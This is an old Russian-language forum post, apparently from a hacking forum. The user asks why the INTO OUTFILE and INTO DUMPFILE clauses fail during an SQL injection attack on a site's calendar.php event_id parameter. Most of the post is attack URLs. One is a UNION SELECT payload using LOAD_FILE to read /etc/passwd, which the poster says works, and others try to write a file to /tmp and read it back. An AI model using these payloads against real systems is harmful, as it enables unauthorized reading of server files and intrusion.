27.10.2009, 21:43
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696
Репутация:
40
|
|
Почему в sql-injection не работают конструкции into oufile и into dumpfile?
Выполняю
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE('/etc/passwd'),...,67
работает!
Выполняю
http://site.com/calendar.php?event_id=68199+union+select+1,2,...,6 7+into+outfile+'/tmp/1'
и пытаюсь прочитать
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE('/tmp/1'),...,67
- не пашет.
Неужели в /tmp нельзя писать! |
|
|